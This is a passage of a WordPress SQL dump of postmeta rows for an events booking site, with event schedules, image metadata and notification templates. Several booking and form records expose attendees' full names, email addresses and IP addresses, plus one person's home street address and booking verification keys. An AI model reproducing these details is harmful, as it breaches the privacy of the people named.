;s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160960,266624,'original-file','2022/05/way-of-the-initiate-3-updraft-pre-smush-original.jpg'),(160961,266624,'smush-info','The file was compressed from 81.07 KB to 79.13 KB saving 2.39 percent using WP-Optimize'),(160963,266624,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:83013;s:12:\"smushed-size\";i:81032;s:15:\"savings-percent\";d:2.39;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:83013;s:10:\"compressed\";i:81032;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6554;s:10:\"compressed\";i:6554;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:22892;s:10:\"compressed\";i:22892;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:26448;s:10:\"compressed\";i:26448;}s:8:\"tileview\";a:2:{s:8:\"original\";i:33284;s:10:\"compressed\";i:33160;}}}'),(160962,266624,'smush-complete','1'),(160957,266619,'_thumbnail_id','266624'),(160930,266621,'mec_transaction_id','BMU65375'),(160931,266621,'mec_user_id','1000003'),(160932,266621,'mec_verified','1'),(160933,266621,'mec_verification_key','23df08d57d3c2ad162b031f40101f01c'),(160934,266621,'mec_cancellation_key','520cc54a6e1f2bedd25602e0e3df6fe9'),(160935,266621,'mec_confirmed','1'),(160936,266621,'mec_event_id','266568'),(160937,266621,'mec_date','1652005800:1652052600'),(160938,266621,'mec_ticket_id',',1,'),(160939,266621,'mec_booking_time','2022-05-02 12:54:05'),(160940,266621,'mec_all_dates','a:0:{}'),(160941,266621,'mec_other_dates','a:0:{}'),(160942,266621,'mec_attention_time','1652005800:1652052600'),(160943,266621,'mec_attention_time_start','1652005800'),(160944,266621,'mec_attention_time_end','1652052600'),(160945,266621,'mec_book_date_submit','20220502125405'),(160946,266621,'mec_booking_location','129'),(160947,266621,'mec_ticket_price_1','0'),(160948,266621,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"96.60.41.70\";}}'),(160949,266621,'mec_price','0'),(160950,266621,'mec_gateway','MEC_gateway_free'),(160951,266621,'mec_gateway_label','Free'),(160969,266625,'mec_read_more',''),(160970,266625,'mec_more_info',''),(160971,266625,'mec_more_info_title',''),(160972,266625,'mec_more_info_target','_self'),(160973,266625,'mec_cost',''),(160974,266625,'mec_currency','a:0:{}'),(160975,266625,'mec_additional_organizer_ids','a:0:{}'),(160976,266625,'mec_additional_location_ids','a:0:{}'),(160977,266625,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160978,266625,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(160979,266625,'mec_certain_weekdays','a:0:{}'),(160980,266625,'mec_allday','0'),(160981,266625,'one_occurrence','0'),(160982,266625,'mec_hide_time','0'),(160983,266625,'mec_hide_end_time','0'),(160984,266625,'mec_comment',''),(160985,266625,'mec_timezone','global'),(160986,266625,'mec_countdown_method','global'),(160987,266625,'mec_public','1'),(160988,266625,'mec_start_date','2022-05-17'),(160989,266625,'mec_start_time_hour','10'),(160990,266625,'mec_start_time_minutes','30'),(160991,266625,'mec_start_time_ampm','AM'),(160992,266625,'mec_start_day_seconds','37800'),(160993,266625,'mec_end_date','2022-05-17'),(160994,266625,'mec_end_time_hour','10'),(160995,266625,'mec_end_time_minutes','30'),(160996,266625,'mec_end_time_ampm','AM'),(160997,266625,'mec_end_day_seconds','37800'),(160998,266625,'mec_repeat_status','0'),(160999,266625,'mec_repeat_type',''),(161000,266625,'mec_repeat_interval','1'),(161001,266625,'mec_repeat_end',''),(161002,266625,'mec_repeat_end_at_occurrences',''),(161003,266625,'mec_repeat_end_at_date',''),(161004,266625,'mec_advanced_days','a:0:{}'),(161005,266625,'mec_in_days',''),(161006,266625,'mec_not_in_days',''),(161007,266625,'mec_hourly_schedules','a:0:{}'),(161008,266625,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161009,266625,'mec_tickets','a:0:{}'),(161010,266625,'mec_fees_global_inheritance','1'),(161011,266625,'mec_fees','a:0:{}'),(161012,266625,'mec_ticket_variations_global_inheritance','1'),(161013,266625,'mec_ticket_variations','a:0:{}'),(161014,266625,'mec_reg_fields_global_inheritance','1'),(161015,266625,'mec_reg_fields','a:0:{}'),(161016,266625,'mec_bfixed_fields','a:0:{}'),(161017,266625,'mec_op','a:0:{}'),(161018,266625,'mec_fields','a:0:{}'),(161019,266625,'mec_event_status','EventScheduled'),(161020,266625,'mec_moved_online_link',''),(161021,266625,'mec_cancelled_reason',''),(161022,266625,'mec_display_cancellation_reason_in_single_page',''),(161023,266625,'boldgrid_hide_page_title','0'),(161024,266625,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161025,266625,'passster_activate_global_protection',NULL),(161026,266625,'passster_activate_protection',NULL),(161027,266625,'passster_protection_type','password'),(161028,266625,'boldgrid_in_page_containers','1'),(161029,266625,'_dp_original','264610'),(161030,266625,'_edit_lock','1693507199:2'),(161031,266625,'_edit_last','2'),(161032,266626,'protect_children',''),(161033,266626,'mec_color',''),(161034,266626,'mec_location_id','118'),(161035,266626,'mec_dont_show_map','0'),(161036,266626,'mec_organizer_id','1'),(161037,266626,'mec_read_more',''),(161038,266626,'mec_more_info',''),(161039,266626,'mec_more_info_title',''),(161040,266626,'mec_more_info_target','_self'),(161041,266626,'mec_cost',''),(161042,266626,'mec_currency','a:0:{}'),(161043,266626,'mec_additional_organizer_ids','a:0:{}'),(161044,266626,'mec_additional_location_ids','a:0:{}'),(161045,266626,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(161046,266626,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(161047,266626,'mec_certain_weekdays','a:0:{}'),(161048,266626,'mec_allday','0'),(161049,266626,'one_occurrence','0'),(161050,266626,'mec_hide_time','0'),(161051,266626,'mec_hide_end_time','0'),(161052,266626,'mec_comment',''),(161053,266626,'mec_timezone','global'),(161054,266626,'mec_countdown_method','global'),(161055,266626,'mec_public','1'),(161056,266626,'mec_start_date','2022-09-15'),(161057,266626,'mec_start_time_hour','7'),(161058,266626,'mec_start_time_minutes','0'),(161059,266626,'mec_start_time_ampm','PM'),(161060,266626,'mec_start_day_seconds','68400'),(161061,266626,'mec_end_date','2022-09-15'),(161062,266626,'mec_end_time_hour','8'),(161063,266626,'mec_end_time_minutes','0'),(161064,266626,'mec_end_time_ampm','PM'),(161065,266626,'mec_end_day_seconds','72000'),(161066,266626,'mec_repeat_status','0'),(161067,266626,'mec_repeat_type',''),(161068,266626,'mec_repeat_interval','1'),(161069,266626,'mec_repeat_end',''),(161070,266626,'mec_repeat_end_at_occurrences',''),(161071,266626,'mec_repeat_end_at_date',''),(161072,266626,'mec_advanced_days','a:0:{}'),(161073,266626,'mec_in_days',''),(161074,266626,'mec_not_in_days',''),(161075,266626,'mec_hourly_schedules','a:0:{}'),(161076,266626,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161077,266626,'mec_tickets','a:0:{}'),(161078,266626,'mec_fees_global_inheritance','1'),(161079,266626,'mec_fees','a:0:{}'),(161080,266626,'mec_ticket_variations_global_inheritance','1'),(161081,266626,'mec_ticket_variations','a:0:{}'),(161082,266626,'mec_reg_fields_global_inheritance','1'),(161083,266626,'mec_reg_fields','a:0:{}'),(161084,266626,'mec_bfixed_fields','a:0:{}'),(161085,266626,'mec_op','a:0:{}'),(161086,266626,'mec_fields','a:0:{}'),(161087,266626,'mec_event_status','EventScheduled'),(161088,266626,'mec_moved_online_link',''),(161089,266626,'mec_cancelled_reason',''),(161090,266626,'mec_display_cancellation_reason_in_single_page',''),(161091,266626,'boldgrid_hide_page_title','0'),(161092,266626,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161093,266626,'passster_activate_global_protection',NULL),(161094,266626,'passster_activate_protection',NULL),(161095,266626,'passster_protection_type','password'),(161098,266626,'_dp_original','266104'),(161097,266626,'boldgrid_in_page_containers','1'),(161099,266626,'_edit_lock','1661360145:2'),(161100,266626,'_edit_last','2'),(161101,266627,'_wp_attached_file','2022/05/arahata-circle-1.jpg'),(161102,266627,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:856;s:6:\"height\";i:482;s:4:\"file\";s:28:\"2022/05/arahata-circle-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"arahata-circle-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161103,266626,'_thumbnail_id','266627'),(161901,266691,'mec_transaction_id','QLR29831'),(161902,266691,'mec_user_id','1000017'),(161903,266691,'mec_verified','1'),(161904,266691,'mec_verification_key','bc66ecd2d1d23bd92358db13b69af91c'),(161905,266691,'mec_cancellation_key','738edb28b43d26a1265e189711d91842'),(161906,266691,'mec_confirmed','1'),(161907,266691,'mec_event_id','266604'),(161908,266691,'mec_date','1655639100:1655643600'),(161909,266691,'mec_ticket_id',',1,'),(161910,266691,'mec_booking_time','2022-05-22 16:52:59'),(161911,266691,'mec_all_dates','a:0:{}'),(161912,266691,'mec_other_dates','a:0:{}'),(161913,266691,'mec_attention_time','1655639100:1655643600'),(161914,266691,'mec_attention_time_start','1655639100'),(161915,266691,'mec_attention_time_end','1655643600'),(161916,266691,'mec_book_date_submit','20220522165259'),(161917,266691,'mec_booking_location','118'),(161918,266691,'mec_ticket_price_1','0'),(161919,266691,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"blueseausa@yahoo.com\";s:4:\"name\";s:9:\"Iyke Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"174.48.5.84\";}}'),(161920,266691,'mec_price','0'),(161921,266691,'mec_gateway','MEC_gateway_free'),(161922,266691,'mec_gateway_label','Free'),(162018,266710,'_field_133','Lura'),(162019,266710,'_field_134','Genz'),(162020,266710,'_field_135','luralg31@gmail.com'),(162021,266710,'_field_137','change of street address'),(162022,266710,'_field_138','new address 6/1/2022:\n4180 Wild Horse Drive\nBroomfield, CO 80023'),(162023,266710,'_form_id','13'),(162024,266710,'_seq_num','107'),(162025,266711,'mec_transaction_id','PBG26291'),(162026,266711,'mec_user_id','1000018'),(162027,266711,'mec_verified','1'),(162028,266711,'mec_verification_key','d506601d19d678fee4713797f086c1d8'),(162029,266711,'mec_cancellation_key','77710203d23e892489a8263611d82548'),(162030,266711,'mec_confirmed','1'),(162031,266711,'mec_event_id','266611'),(162032,266711,'mec_date','1655838000:1655841600'),(162033,266711,'mec_ticket_id',',1,'),(162034,266711,'mec_booking_time','2022-05-24 18:21:08'),(162035,266711,'mec_all_dates','a:0:{}'),(162036,266711,'mec_other_dates','a:0:{}'),(162037,266711,'mec_attention_time','1655838000:1655841600'),(162038,266711,'mec_attention_time_start','1655838000'),(162039,266711,'mec_attention_time_end','1655841600'),(162040,266711,'mec_book_date_submit','20220524182108'),(162041,266711,'mec_booking_location','144'),(162042,266711,'mec_ticket_price_1','0'),(162043,266711,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:15:\"crushold@me.com\";s:4:\"name\";s:13:\"Candy Rushold\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"184.167.126.140\";}}'),(162044,266711,'mec_price','0'),(162045,266711,'mec_gateway','MEC_gateway_free'),(162046,266711,'mec_gateway_label','Free'),(162047,266713,'protect_children',''),(162048,266713,'mec_color',''),(162049,266713,'mec_location_id','131'),(162050,266713,'mec_dont_show_map','0'),(162051,266713,'mec_organizer_id','1'),(162052,266713,'mec_read_more',''),(162053,266713,'mec_more_info',''),(162054,266713,'mec_more_info_title',''),(162055,266713,'mec_more_info_target','_self'),(162056,266713,'mec_cost',''),(162057,266713,'mec_currency','a:0:{}'),(162058,266713,'mec_additional_organizer_ids','a:0:{}'),(162059,266713,'mec_additional_location_ids','a:0:{}'),(162060,266713,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(162061,266713,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162062,266713,'mec_certain_weekdays','a:0:{}'),(162063,266713,'mec_allday','0'),(162064,266713,'one_occurrence','0'),(162065,266713,'mec_hide_time','0'),(162066,266713,'mec_hide_end_time','0'),(162067,266713,'mec_comment',''),(162068,266713,'mec_timezone','global'),(162069,266713,'mec_countdown_method','global'),(162070,266713,'mec_public','1'),(162071,266713,'mec_start_date','2022-06-12'),(162072,266713,'mec_start_time_hour','1'),(162073,266713,'mec_start_time_minutes','0'),(162074,266713,'mec_start_time_ampm','PM'),(162075,266713,'mec_start_day_seconds','46800'),(162076,266713,'mec_end_date','2022-06-12'),(162077,266713,'mec_end_time_hour','2'),(162078,266713,'mec_end_time_minutes','30'),(162079,266713,'mec_end_time_ampm','PM'),(162080,266713,'mec_end_day_seconds','52200'),(162081,266713,'mec_repeat_status','0'),(162082,266713,'mec_repeat_type',''),(162083,266713,'mec_repeat_interval','1'),(162084,266713,'mec_repeat_end',''),(162085,266713,'mec_repeat_end_at_occurrences',''),(162086,266713,'mec_repeat_end_at_date',''),(162087,266713,'mec_advanced_days','a:0:{}'),(162088,266713,'mec_in_days',''),(162089,266713,'mec_not_in_days',''),(162090,266713,'mec_hourly_schedules','a:0:{}'),(162091,266713,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(162092,266713,'mec_tickets','a:0:{}'),(162093,266713,'mec_fees_global_inheritance','1'),(162094,266713,'mec_fees','a:0:{}'),(162095,266713,'mec_ticket_variations_global_inheritance','1'),(162096,266713,'mec_ticket_variations','a:0:{}'),(162097,266713,'mec_reg_fields_global_inheritance','1'),(162098,266713,'mec_reg_fields','a:0:{}'),(162099,266713,'mec_bfixed_fields','a:0:{}'),(162100,266713,'mec_op','a:0:{}'),(162101,266713,'mec_fields','a:0:{}'),(162102,266713,'mec_event_status','EventScheduled'),(162103,266713,'mec_moved_online_link',''),(162104,266713,'mec_cancelled_reason',''),(162105,266713,'mec_display_cancellation_reason_in_single_page',''),(162106,266713,'boldgrid_hide_page_title','0'),(162107,266713,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(162108,266713,'passster_activate_global_protection',NULL),(162109,266713,'passster_activate_protection',NULL),(162110,266713,'passster_protection_type','password'),(162111,266713,'boldgrid_in_page_containers','1'),(162112,266713,'_dp_original','265240'),(162113,266713,'_edit_lock','1653533402:2'),(162114,266713,'_edit_last','2'),(162115,266714,'_wp_attached_file','2022/05/Chains.webp'),(162116,266714,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2022/05/Chains.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Chains-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Chains-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:19:\"Chains-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:19:\"Chains-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:19:\"Chains-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:19:\"Chains-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(162117,266714,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/Chains.webp - cannot be optimized, it has an invalid file type'),(162118,266714,'smush-complete',''),(162119,266713,'_thumbnail_id','266714'),(163449,266764,'mec_cost',''),(162120,266715,'mec_color',''),(162121,266715,'mec_location_id','129'),(162122,266715,'mec_dont_show_map','0'),(162123,266715,'mec_organizer_id','1'),(162124,266715,'mec_read_more',''),(162125,266715,'mec_more_info',''),(162126,266715,'mec_more_info_title',''),(162127,266715,'mec_more_info_target','_self'),(162128,266715,'mec_cost',''),(162129,266715,'mec_currency','a:0:{}'),(162130,266715,'mec_additional_organizer_ids','a:0:{}'),(162131,266715,'mec_additional_location_ids','a:0:{}'),(162132,266715,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(162133,266715,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(162134,266715,'mec_certain_weekdays','a:0:{}'),(162135,266715,'mec_allday','0'),(162136,266715,'one_occurrence','0'),(162137,266715,'mec_hide_time','0'),(162138,266715,'mec_hide_end_time','0'),(162139,266715,'mec_comment',''),(162140,266715,'mec_timezone','global'),(162141,266715,'mec_countdown_method','global'),(162142,266715,'mec_public','1'),(162143,266715,'mec_start_date','2022-06-12'),(162144,266715,'mec_start_time_hour','10'),(162145,266715,'mec_start_time_minutes','30'),(162146,266715,'mec_start_time_ampm','AM'),(162147,266715,'mec_start_day_seconds','37800'),(162148,266715,'mec_end_date','2022-06-12'),(162149,266715,'mec_end_time_hour','11'),(162150,266715,'mec_end_time_minutes','30'),(162151,266715,'mec_end_time_ampm','PM'),(162152,266715,'mec_end_day_seconds','84600'),(162153,266715,'mec_repeat_status','0'),(162154,266715,'mec_repeat_type',''),(162155,266715,'mec_repeat_interval','1'),(162156,266715,'mec_repeat_end',''),(162157,266715,'mec_repeat_end_at_occurrences',''),(162158,266715,'mec_repeat_end_at_date',''),(162159,266715,'mec_advanced_days','a:0:{}'),(162160,266715,'mec_in_days',''),(162161,266715,'mec_not_in_days',''),(162162,266715,'mec_hourly_schedules','a:0:{}'),(162163,266715,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_di